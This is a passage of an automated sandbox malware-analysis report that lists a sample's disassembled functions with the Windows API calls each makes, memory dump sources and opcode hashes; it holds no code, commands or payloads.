                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 0c9a8f2ee16711228b0a81dfdfbb51338a7258489e9186f6f8b310cb2bf9ad82
                • Instruction ID: 0aad9cdc50e4a08587a2572a7544e1e034f1e0a0085d93d51a67c3abb3af01cd
                • Opcode Fuzzy Hash: 0c9a8f2ee16711228b0a81dfdfbb51338a7258489e9186f6f8b310cb2bf9ad82
                • Instruction Fuzzy Hash: 88411972A04304BFD7259F38CC85BAABBE9EF98720F10452EF556DB6A1D771D9018780
                Uniqueness

                Uniqueness Score: -1.00%

                Function 001856D9 Relevance: 6.1, APIs: 4, Instructions: 110fileCOMMON
                Download Yara Rule
                APIs
                • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 00185783
                • GetLastError.KERNEL32(?,00000000), ref: 001857A9
                • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 001857CE
                • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 001857FA
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: CreateHardLink$DeleteErrorFileLast
                • String ID:
                • API String ID: 3321077145-0
                • Opcode ID: c1fc8883805c7483dd28926574870e09da9b0b870a0859fb0b106ceacd67a219
                • Instruction ID: 19da60c5243a30792974344b641217fbedf8d2f045a53e12b562554ba9feae7a
                • Opcode Fuzzy Hash: c1fc8883805c7483dd28926574870e09da9b0b870a0859fb0b106ceacd67a219
                • Instruction Fuzzy Hash: 52411C39600A10DFCB15EF15C444A5DBBF2EF99320B198499E84A5B362CB30FD41CF91
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0014D8C3 Relevance: 6.1, APIs: 4, Instructions: 110COMMONLIBRARYCODE
                Download Yara Rule
                APIs
                • MultiByteToWideChar.KERNEL32(?,00000000,8BE85006,00136D71,00000000,00000000,001382D9,?,001382D9,?,00000001,00136D71,8BE85006,00000001,001382D9,001382D9), ref: 0014D910
                • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0014D999
                • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 0014D9AB
                • __freea.LIBCMT ref: 0014D9B4
                  • Part of subcall function 00143820: RtlAllocateHeap.NTDLL(00000000,?,001E1444,?,0012FDF5,?,?,0011A976,00000010,001E1440,001113FC,?,001113C6,?,00111129), ref: 00143852
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                • String ID:
                • API String ID: 2652629310-0
                • Opcode ID: bb383f41671998ec27d223941d76716614345c85aec8edb9b3e29b4adec0897d
                • Instruction ID: 99283ee26f52fe21ea6f58a07b09612fa0bc2ce03926dd812cf14cbb3c57ecc1
                • Opcode Fuzzy Hash: bb383f41671998ec27d223941d76716614345c85aec8edb9b3e29b4adec0897d
                • Instruction Fuzzy Hash: 5831BE72A0020AABDF259F64EC45EAF7BA5EB41714F054268FC04D7260EB35DD90CB90
                Uniqueness

                Uniqueness Score: -1.00%

                Function 001A52C1 Relevance: 6.1, APIs: 4, Instructions: 104windowCOMMON
                Download Yara Rule
                APIs
                • SendMessageW.USER32(?,00001024,00000000,?), ref: 001A5352
                • GetWindowLongW.USER32(?,000000F0), ref: 001A5375
                • SetWindowLongW.USER32(?,000000F0,00000000), ref: 001A5382
                • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 001A53A8
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: LongWindow$InvalidateMessageRectSend
                • String ID:
                • API String ID: 3340791633-0
                • Opcode ID: 04cdcf61c1c5521c9354b7c2ac24b60e85b04248261b3cd007ecdc969e2b6371
                • Instruction ID: 8f569d0cffebb4e56c56020d52c031885d958f844bdc90fceede6f434586e56b
                • Opcode Fuzzy Hash: 04cdcf61c1c5521c9354b7c2ac24b60e85b04248261b3cd007ecdc969e2b6371
                • Instruction Fuzzy Hash: AF31C238A5DA08FFEF349A54CC55BE837A7BF963D0F584101FA11962E1C7B09980DB82
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0017AB9C Relevance: 6.1, APIs: 4, Instructions: 103keyboardwindowCOMMON
                Download Yara Rule
                APIs
                • GetKeyboardState.USER32(?,7694C0D0,?,00008000), ref: 0017ABF1
                • SetKeyboardState.USER32(00000080,?,00008000), ref: 0017AC0D
                • PostMessageW.USER32(00000000,00000101,00000000), ref: 0017AC74
                • SendInput.USER32(00000001,?,0000001C,7694C0D0,?,00008000), ref: 0017ACC6
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: KeyboardState$InputMessagePostSend
                • String ID:
                • API String ID: 432972143-0
                • Opcode ID: ba80185c5710644aac64af41ba000a95dbd5e111b9afb93c07d15b3414ec1ced
                • Instruction ID: d098af60d0d092c3c72bcc141ba317d0ea8777ade01ef55d7d715d780fe5a137
                • Opcode Fuzzy Hash: ba80185c5710644aac64af41ba000a95dbd5e111b9afb93c07d15b3414ec1ced
                • Instruction Fuzzy Hash: 3C31E630A446187FEF36CB658C05BFE7BB5AFC9320F84C21AE489962D1C37599858792
                Uniqueness

                Uniqueness Score: -1.00%

                Function 001A7674 Relevance: 6.1, APIs: 4, Instructions: 102windowCOMMON
                Download Yara Rule
                APIs
                • ClientToScreen.USER32(?,?), ref: 001A769A
                • GetWindowRect.USER32(?,?), ref: 001A7710
                • PtInRect.USER32(?,?,001A8B89), ref: 001A7720
                • MessageBeep.USER32(00000000), ref: 001A778C
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: Rect$BeepClientMessageScreenWindow
                • String ID:
                • API String ID: 1352109105-0
                • Opcode ID: e17a8c787f94240633407fb98f7d68ddd69229150520de1a8f06a9ffed01fc9f
                • Instruction ID: ceafda6ce3ccb881c97ea4bec01e562911ef4f635e4ac7f9b385b377751f2418
                • Opcode Fuzzy Hash: e17a8c787f94240633407fb98f7d68ddd69229150520de1a8f06a9ffed01fc9f
                • Instruction Fuzzy Hash: F9416F38A05254EFCB12CFA8CD98EAD77F5FB4A314F1541A8E4149F2A1D730AA81CF90
                Uniqueness

                Uniqueness Score: -1.00%

                Function 001A16DA Relevance: 6.1, APIs: 4, Instructions: 101COMMON
                Download Yara Rule
                APIs
                • GetForegroundWindow.USER32 ref: 001A16EB
                  • Part of subcall function 00173A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00173A57
                  • Part of subcall function 00173A3D: GetCurrentThreadId.KERNEL32 ref: 00173A5E
                  • Part of subcall function 00173A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,001725B3), ref: 00173A65
                • GetCaretPos.USER32(?), ref: 001A16FF
                • ClientToScreen.USER32(00000000,?), ref: 001A174C
                • GetForegroundWindow.USER32 ref: 001A1752
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                • String ID:
                • API String ID: 2759813231-0
                • Opcode ID: 562fcd139ad94752aaf4d3af325d59a4ddd784eba5cb5db4b9c67f40c716c03e
                • Instruction ID: a5477bbf4243e93102ba8c6ad210e40d3c026b623d28c65c062840df8ce86110
                • Opcode Fuzzy Hash: 562fcd139ad94752aaf4d3af325d59a4ddd784eba5cb5db4b9c67f40c716c03e
                • Instruction Fuzzy Hash: B0312F75D00249AFC704EFA9C881CEEBBF9EF59304B5480A9E415E7252D731DE45CBA0
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0017D4DC Relevance: 6.1, APIs: 4, Instructions: 86processCOMMON
                Download Yara Rule
                APIs
                • CreateToolhelp32Snapshot.KERNEL32 ref: 0017D501
                • Process32FirstW.KERNEL32(00000000,?), ref: 0017D50F
                • Process32NextW.KERNEL32(00000000,?), ref: 0017D52F
                • CloseHandle.KERNEL32(00000000), ref: 0017D5DC
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                • String ID:
                • API String ID: 420147892-0
                • Opcode ID: 4f811193b7285d5a0cb7d2dc6ca6d4161ee4b67419b523bf3cfbfb3b1e497a2f
                • Instruction ID: 2098306f7e2747848776ff96c9223e9476df6d25120463af7580aa66f561d800
                • Opcode Fuzzy Hash: 4f811193b7285d5a0cb7d2dc6ca6d4161ee4b67419b523bf3cfbfb3b1e497a2f
                • Instruction Fuzzy Hash: 1B31D1711083059FD304EF54D881AAFBBF8EFA9344F10492DF589871A1EB719989CB92
                Uniqueness

                Uniqueness Score: -1.00%

                Function 001A8FC9 Relevance: 6.1, APIs: 4, Instructions: 78windowCOMMON
                Download Yara Rule
                APIs
                  • Part of subcall function 00129BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00129BB2
                • GetCursorPos.USER32(?), ref: 001A9001
                • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,00167711,?,?,?,?,?), ref: 001A9016
                • GetCursorPos.USER32(?), ref: 001A905E
                • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,00167711,?,?,?), ref: 001A9094
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: Cursor$LongMenuPopupProcTrackWindow
                • String ID:
                • API String ID: 2864067406-0
                • Opcode ID: b4c0dee4b824aa67a665904fff5b3c5d043128500ae861319ad61f917ba899ad
                • Instruction ID: 15f5666b6587bf481a3fe291b0c6e50ca4400f124aa36dcb848958320a732e82
                • Opcode Fuzzy Hash: b4c0dee4b824aa67a665904fff5b3c5d043128500ae861319ad61f917ba899ad
                • Instruction Fuzzy Hash: D1219F39600118FFCB268F94D998EFE7BB9EB4A790F144155F9058B261C33199D0DBA0
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0017D2C1 Relevance: 6.1, APIs: 4, Instructions: 78COMMON
                Download Yara Rule
                APIs
                • GetFileAttributesW.KERNEL32(?,001ACB68), ref: 0017D2FB
                • GetLastError.KERNEL32 ref: 0017D30A
                • CreateDirectoryW.KERNEL32(?,00000000), ref: 0017D319
                • CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,001ACB68), ref: 0017D376
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: CreateDirectory$AttributesErrorFileLast
                • String ID:
                • API String ID: 2267087916-0
                • Opcode ID: c1c0e1e1ede1cd68bed650bd50a8067d8d6397bfb10ed2470d62ac7acfc0a973
                • Instruction ID: dcf2cf2dc06d7eba80b1e43caccc9299a7d49030e3890d9c83f72eb08eefb7ef
                • Opcode Fuzzy Hash: c1c0e1e1ede1cd68bed650bd50a8067d8d6397bfb10ed2470d62ac7acfc0a973
                • Instruction Fuzzy Hash: 142183B05092059FC714DF24D8818AA77F4FF56764F108A1DF4A9C72A1DB31D946CB93
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00171571 Relevance: 6.1, APIs: 4, Instructions: 78memoryCOMMON
                Download Yara Rule
                APIs
                  • Part of subcall function 00171014: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 0017102A
                  • Part of subcall function 00171014: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00171036
                  • Part of subcall function 00171014: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00171045
                  • Part of subcall function 00171014: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 0017104C
                  • Part of subcall function 00171014: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00171062
                • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 001715BE
                • _memcmp.LIBVCRUNTIME ref: 001715E1
                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00171617
                • HeapFree.KERNEL32(00000000), ref: 0017161E
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
                • String ID:
                • API String ID: 1592001646-0
                • Opcode ID: 4ccfd41c2243093069922077f6ab6280a6232cbea6ea0bbdaec1627da8e53d38
                • Instruction ID: e03bceaee4c09da60ea1b7e76b973698c6ccfcedfd125afaa33957e801f82d4e
                • Opcode Fuzzy Hash: 4ccfd41c2243093069922077f6ab6280a6232cbea6ea0bbdaec1627da8e53d38
                • Instruction Fuzzy Hash: FD219A31E00108FFDF14DFA8C945BEEB7B8EF45354F188459E449AB241E770AA45DBA0
                Uniqueness

                Uniqueness Score: -1.00%

                Function 001A2782 Relevance: 6.1, APIs: 4, Instructions: 75COMMON
                Download Yara Rule
                APIs
                • GetWindowLongW.USER32(?,000000EC), ref: 001A280A
                • SetWindowLongW.USER32(?,000000EC,00000000), ref: 001A2824
                • SetWindowLongW.USER32(?,000000EC,00000000), ref: 001A2832
                • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 001A2840
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: Window$Long$AttributesLayered
                • String ID:
                • API String ID: 2169480361-0
                • Opcode ID: e3f4bc5d7683784e348b00757ffc739a5731983294bfdfa1ca89e7e8b29c68b4
                • Instruction ID: 3881708a40ac4180bdfc5e98c29b1e3ae741bcc4fac2de7117429fbb64d0f39a
                • Opcode Fuzzy Hash: e3f4bc5d7683784e348b00757ffc739a5731983294bfdfa1ca89e7e8b29c68b4
                • Instruction Fuzzy Hash: A821D339708511AFD718DB28C844FAA7B95AF57324F148158F4268B6E2CB75FD82CBD0
                Uniqueness

                Uniqueness Score: -1.00%

                Function 001778F5 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 71stringCOMMON
                Download Yara Rule
                APIs
                  • Part of subcall function 00178D7D: lstrlenW.KERNEL32(?,00000002,000000FF,?,?,?,0017790A,?,000000FF,?,00178754,00000000,?,0000001C,?,?), ref: 00178D8C
                  • Part of subcall function 00178D7D: lstrcpyW.KERNEL32(00000000,?), ref: 00178DB2
                  • Part of subcall function 00178D7D: lstrcmpiW.KERNEL32(00000000,?,0017790A,?,000000FF,?,00178754,00000000,?,0000001C,?,?), ref: 00178DE3
                • lstrlenW.KERNEL32(?,00000002,000000FF,?,000000FF,?,00178754,00000000,?,0000001C,?,?,00000000), ref: 00177923
                • lstrcpyW.KERNEL32(00000000,?), ref: 00177949
                • lstrcmpiW.KERNEL32(00000002,cdecl,?,00178754,00000000,?,0000001C,?,?,00000000), ref: 00177984
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: lstrcmpilstrcpylstrlen
                • String ID: cdecl
                • API String ID: 4031866154-3896280584
                • Opcode ID: 254019ee3dc143357249d941cedf7376a32a660aeb6309fe125f23b0a153f60e
                • Instruction ID: 8280d7784366e95ef154bec2d2229f7a4dc211813a859fc72527a51f99130c0a
                • Opcode Fuzzy Hash: 254019ee3dc143357249d941cedf7376a32a660aeb6309fe125f23b0a153f60e
                • Instruction Fuzzy Hash: 4F11063A201242ABCB156F34D844D7A77B5FF95364F00802AF90AC72A4EB319911C791
                Uniqueness

                Uniqueness Score: -1.00%

                Function 001A7CC2 Relevance: 6.1, APIs: 4, Instructions: 70COMMON
                Download Yara Rule
                APIs
                • GetWindowLongW.USER32(?,000000F0), ref: 001A7D0B
                • SetWindowLongW.USER32(00000000,000000F0,?), ref: 001A7D2A
                • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 001A7D42
                • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,0018B7AD,00000000), ref: 001A7D6B
                  • Part of subcall function 00129BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00129BB2
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: Window$Long
                • String ID:
                • API String ID: 847901565-0
                • Opcode ID: fd5cc40c2c01909ac01ce493e1b2801a29ba2a6dd16a3eca0896aa71135ed31a
                • Instruction ID: 3afc889f685f589711f84befc36caa4bd3668f022f1d17a7f4fdf46516090f41
                • Opcode Fuzzy Hash: fd5cc40c2c01909ac01ce493e1b2801a29ba2a6dd16a3eca0896aa71135ed31a
                • Instruction Fuzzy Hash: AC11A235604665AFCB109FA8CC04EAA3BA5AF46370B154728F839DB2F0D7309A50CB90
                Uniqueness

                Uniqueness Score: -1.00%

                Function 001A5660 Relevance: 6.1, APIs: 4, Instructions: 67windowCOMMON
                Download Yara Rule
                APIs
                • SendMessageW.USER32(?,00001060,?,00000004), ref: 001A56BB
                • _wcslen.LIBCMT ref: 001A56CD
                • _wcslen.LIBCMT ref: 001A56D8
                • SendMessageW.USER32(?,00001002,00000000,?), ref: 001A5816
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: MessageSend_wcslen
                • String ID:
                • API String ID: 455545452-0
                • Opcode ID: 294bbde9f3bd9a0bb80208dbf44897097a9b030b87cc2a8c6c9eadec11e7ea56
                • Instruction ID: c60c9f0f5447d182cbcd3451b3f1f34357fde5a2da5f601d351f8bc239c86dc2
                • Opcode Fuzzy Hash: 294bbde9f3bd9a0bb80208dbf44897097a9b030b87cc2a8c6c9eadec11e7ea56
                • Instruction Fuzzy Hash: F111D679A08604A6DB20DF61CC85AEE777CFF16764F104026F919D6081EB70DA84CBA0
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00141D09 Relevance: 6.1, APIs: 4, Instructions: 63COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 4691ac88bad7b1babaae0032589860c58f07cf6bcd9b8eb2eac47156d24d695f
                • Instruction ID: 1fb3d3d4fd138d4d8b414c98f9cc5f840410dee5bdde17bd9c95982ef2e5ef8f
                • Opcode Fuzzy Hash: 4691ac88bad7b1babaae0032589860c58f07cf6bcd9b8eb2eac47156d24d695f
                • Instruction Fuzzy Hash: FB018BF2A096567EFA212AF86CC4F67665DEF523B8F350325F531A11E2DB708C804160
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00171A27 Relevance: 6.1, APIs: 4, Instructions: 56windowCOMMON
                Download Yara Rule
                APIs
                • SendMessageW.USER32(?,000000B0,?,?), ref: 00171A47
                • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00171A59
                • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00171A6F
                • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00171A8A
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
